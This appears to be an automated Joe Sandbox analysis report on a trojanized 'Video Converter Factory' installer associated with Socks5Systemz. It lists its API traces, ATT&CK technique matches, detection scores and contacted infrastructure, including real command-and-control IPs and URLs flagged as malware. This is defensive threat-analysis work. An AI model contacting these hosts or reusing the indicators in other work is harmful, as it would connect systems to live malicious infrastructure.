                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_609255FF sqlite3_bind_text,3_2_609255FF
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,3_2_6096A5EE
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,3_2_6094B54C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60925686
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,3_2_6094A6C5
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,3_2_609256E5
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B6ED
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6092562A sqlite3_bind_blob,3_2_6092562A
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,3_2_60925655
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6094C64A
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_609687A7
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6095F7F7
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,3_2_6092570B
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F772
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,3_2_60925778
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6090577D sqlite3_bind_parameter_name,3_2_6090577D
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B764
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6090576B sqlite3_bind_parameter_count,3_2_6090576B
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,3_2_6094A894
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F883
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,3_2_6094C8C2
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,3_2_6096281E
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,3_2_6096583A
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,3_2_6095F9AD
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6094A92B
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6090EAE5 sqlite3_transfer_bindings,3_2_6090EAE5
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,3_2_6095FB98
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_6095ECA6
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095FCCE
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6095FDAE
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,3_2_60966DF1
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_60969D75
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,3_2_6095FFB2
                  MITRE ATT&CK Matrix (the report's 14-column matrix, listed here as one line per tactic; a number in front of a technique is the report's matched-signature count for that technique)

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                  Execution: 3 Native API; 2 Command and Scripting Interpreter; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                  Persistence: 1 DLL Side-Loading; 5 Windows Service; 1 Bootkit; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                  Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Access Token Manipulation; 5 Windows Service; 2 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                  Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 21 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 121 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 2 Process Injection; 1 Bootkit; Dynamic API Resolution
                  Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                  Discovery: 1 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 35 System Information Discovery; 141 Security Software Discovery; 1 Process Discovery; 121 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 3 System Owner/User Discovery; 1 System Network Configuration Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                  Collection: 1 Archive Collected Data; 1 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                  Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 11 Non-Standard Port; 1 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                  Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                  Source | Detection | Scanner | Label | Link
                  Oz2UhFBTHy.exe | 16% | ReversingLabs | Win32.Trojan.Munp

                  Source | Detection | Scanner | Label | Link
                  C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exe | 100% | Joe Sandbox ML
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | 100% | Joe Sandbox ML
                  C:\ProgramData\VideoConverterFactory\sqlite3.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\LTDIS13n.dll (copy) | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\gdiplus.dll (copy) | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-7N8CJ.tmp | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-9MUD1.tmp | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-DEPI7.tmp | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-L1OQV.tmp | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-T8AR0.tmp | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3BKG.tmp | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3OTV.tmp | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\ltkrn13n.dll (copy) | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcp71.dll (copy) | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcr71.dll (copy) | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\sqlite3.dll (copy) | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.dll (copy) | 0% | ReversingLabs
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  https://188.119.66.185/UX | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/ography | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/T | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/0 | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/a | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/ai/?key=8f3f2b3ab | 100% | Avira URL Cloud | malware
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328b | 100% | Avira URL Cloud | malware
                  http://31.214.157.226/rand | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325 | 100% | Avira URL Cloud | malware
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4 | 100% | Avira URL Cloud | malware
                  https://188.119.66.185/-X | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/gX | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a | 100% | Avira URL Cloud | malware
                  http://wonderwork.ucoz.com/ | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/yX | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/?X | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/CX | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/mH | 0% | Avira URL Cloud | safe
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a52 | 100% | Avira URL Cloud | malware
                  https://188.119.66.185/ai/?key=8f3f2b3ab710463926 | 100% | Avira URL Cloud | malware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328bfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://31.214.157.226/randfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965afalse
                    • Avira URL Cloud: malware
                    unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | Oz2UhFBTHy.tmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.dr | false | - | high
https://188.119.66.185/UX | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/T | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ography | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | Oz2UhFBTHy.exe | false | - | high
https://188.119.66.185/ | videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline | Oz2UhFBTHy.exe | false | - | high
https://188.119.66.185/a | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325 | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003320000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4 | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.remobjects.com/psU | Oz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.dr | false | - | high
https://188.119.66.185/0 | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/priseCertificates | videoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://188.119.66.185/-X | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/rosoft | videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://188.119.66.185/gX | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/en-GB | videoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://wonderwork.ucoz.com/ | videoconverterfactory.exe, 00000003.00000000.1372571688.00000000004D5000.00000002.00000001.01000000.00000009.sdmp, VideoConverterFactory.exe.3.dr, is-LETAI.tmp.2.dr, videoconverterfactory.exe.2.dr | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/CX | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/ps | Oz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.dr | false | - | high
https://188.119.66.185/?X | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.easycutstudio.com/support.html | Oz2UhFBTHy.exe, 00000000.00000002.2625346135.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1357693021.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1357767019.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2626002203.0000000002168000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000003.1359995199.0000000002168000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000003.1359914020.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2624390518.0000000000807000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://188.119.66.185/mH | videoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/yX | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a52 | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab710463926 | videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
31.214.157.206 | unknown | Germany | 58329 | RACKPLACEDE | false
31.214.157.226 | unknown | Germany | 58329 | RACKPLACEDE | false
188.119.66.185 | unknown | Russian Federation | 209499 | FLYNETRU | false
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1576054
                                        Start date and time:2024-12-16 13:41:51 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 6m 42s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:9
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Oz2UhFBTHy.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:667621f07a3de153960af063462b20fe.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@5/30@0/3
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 203
                                        • Number of non-executed functions: 262
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: Oz2UhFBTHy.exe
Time | Type | Description
07:43:21 | API Interceptor | 562906x Sleep call for process: videoconverterfactory.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
31.214.157.206 | GEm3o8pION.exe | malicious | Socks5Systemz | -
31.214.157.206 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | -
31.214.157.206 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | -
31.214.157.206 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | -
31.214.157.206 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | -
31.214.157.206 | 7i6bUvYZ4L.exe | malicious | Socks5Systemz | -
31.214.157.206 | file.exe | malicious | Socks5Systemz | -
31.214.157.206 | imMQqf6YWk.exe | malicious | Socks5Systemz | -
31.214.157.206 | imMQqf6YWk.exe | malicious | Socks5Systemz | -
31.214.157.206 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | -
31.214.157.226 | N6jsQ3XNNX.exe | malicious | Socks5Systemz | 31.214.157.226/rand
31.214.157.226 | cv viewer plugin 8.31.40.exe | malicious | Socks5Systemz | 31.214.157.226/rand
188.119.66.185 | GEm3o8pION.exe | malicious | Socks5Systemz | -
188.119.66.185 | GEm3o8pION.exe | malicious | Socks5Systemz | -
188.119.66.185 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | -
188.119.66.185 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | -
188.119.66.185 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | -
188.119.66.185 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | -
188.119.66.185 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | -
188.119.66.185 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | -
188.119.66.185 | 7i6bUvYZ4L.exe | malicious | Socks5Systemz | -
188.119.66.185 | file.exe | malicious | Socks5Systemz | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net | tWKuskUD7s.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | download.ps1 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | msimg32.dll | malicious | RHADAMANTHYS | 13.107.246.63
